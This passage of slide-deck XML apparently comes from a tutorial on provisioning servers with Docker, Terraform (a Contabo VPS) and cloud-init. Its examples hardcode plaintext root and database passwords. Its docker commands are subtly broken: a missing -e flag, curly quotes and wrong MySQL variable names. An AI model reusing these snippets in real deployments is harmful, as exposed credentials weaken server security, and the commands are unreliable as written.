                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MariaDB</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2380">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -d -p 3306:3306 -e MARIADB_USER=”mdb_user1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MARIADB_PASSWORD=”mdb_pass1” MARIADB_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROOT_PASSWORD="sUper3R4nd0m" mariadb:latest</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1879">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2180">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2180">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2065">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -d -p 3307:3306 -e MYSQLDB_USER=”mdb_user1” MYSQLDB_PASSWORD=”mdb_pass1” MYSQL_ROOT_PASSWORD="sUper3R4nd0m" mysql:latest</a:t>
            </a:r>
            <a:endParaRPr sz="2065">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1879">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2419" name="Google Shape;2419;p395"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144001" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2420" name="Google Shape;2420;p395"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7042775" y="141000"/>
            <a:ext cx="1880449" cy="536025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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396"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1014300"/>
            <a:ext cx="8520600" cy="25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5120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How you can provision </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infrastructure(server)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programmatically</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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39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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terraform</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2431" name="Google Shape;2431;p3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600"/>
              <a:t>Terraform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> a programmable cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> on aws, gcp or azure</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2436" name="Google Shape;2436;p39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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terraform</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2437" name="Google Shape;2437;p3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000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Terraform is an infrastructure-as-code (IaC) solution that enables the management of infrastructure.</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10125" y="-7100"/>
            <a:ext cx="9133800" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEFE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43" name="Google Shape;2443;p399"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450025" y="259425"/>
            <a:ext cx="2424450" cy="691100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2444" name="Google Shape;2444;p399"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10708" l="2623" r="8440" t="22982"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="384050" y="1461175"/>
            <a:ext cx="8490426" cy="2690300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2449" name="Google Shape;2449;p400"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144018" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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3" name="Shape 2453"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2454" name="Google Shape;2454;p40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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terraform</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2455" name="Google Shape;2455;p401"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455950" y="1152475"/>
            <a:ext cx="8376300" cy="22755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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>terraform init</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>terraform plan</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>terraform apply -auto-approve</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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9" name="Shape 2459"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2460" name="Google Shape;2460;p402"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465600" y="918850"/>
            <a:ext cx="5526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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contabo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terraform file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2461" name="Google Shape;2461;p402"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455950" y="156850"/>
            <a:ext cx="5412900" cy="4784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75"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>terraform {</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required_providers {</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contabo = {</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source = "contabo/contabo"</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version = "&gt;= 0.1.26"</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provider "contabo" {</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oauth2_client_id     = "xxxxxx"</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oauth2_client_secret = "xxxxxx"</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oauth2_user          = "xxxxx"</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oauth2_pass          = "xxxxx"</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resource "contabo_instance" "PBX_VPS" {</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product_id   = "V46"</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period       = "1"   # Assuming "1" stands for 1 month</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region       = "EU"</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display_name = "PBX_VPS"</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image_id     = "35f3129d-5b02-45ff-9137-e8a12d2832ec"  </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  root_password = "7999452711"</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rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2462" name="Google Shape;2462;p402"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465600" y="1528450"/>
            <a:ext cx="5526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820">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main.tf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2467" name="Google Shape;2467;p403"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="30158" l="1470" r="1789" t="31939"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644175" y="1994350"/>
            <a:ext cx="6448401" cy="1403625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2468" name="Google Shape;2468;p403"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6483200" y="353150"/>
            <a:ext cx="2326525" cy="663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62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="942875" y="105975"/>
            <a:ext cx="7406811" cy="4838699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2" name="Shape 2472"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2473" name="Google Shape;2473;p404"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3319" l="3193" r="911" t="3968"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="880213" y="1144900"/>
            <a:ext cx="7383576" cy="3574501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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p40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520" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cloud-init</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2479" name="Google Shape;2479;p405"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455950" y="1152475"/>
            <a:ext cx="8213100" cy="2179500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-410686" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>/etc/cloud/cloud.cfg.d/99_custom.cfg</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-410686" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>/var/lib/cloud/seed/nocloud/user-data</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>tail -f /var/log/cloud-init-output.log</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>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406"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="13594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920" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cloud-init</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> Logs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2485" name="Google Shape;2485;p406"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455950" y="2066875"/>
            <a:ext cx="8376300" cy="16785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4200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>tail -f /var/log/cloud-init-output.log</a:t>
            </a:r>
            <a:endParaRPr sz="4200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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pic>
        <p:nvPicPr>
          <p:cNvPr id="2490" name="Google Shape;2490;p407"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="341475"/>
            <a:ext cx="9144000" cy="4600577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2495" name="Google Shape;2495;p408"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5696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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How you can provision server?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2496" name="Google Shape;2496;p408"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375625" y="1572925"/>
            <a:ext cx="8456700" cy="2881200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
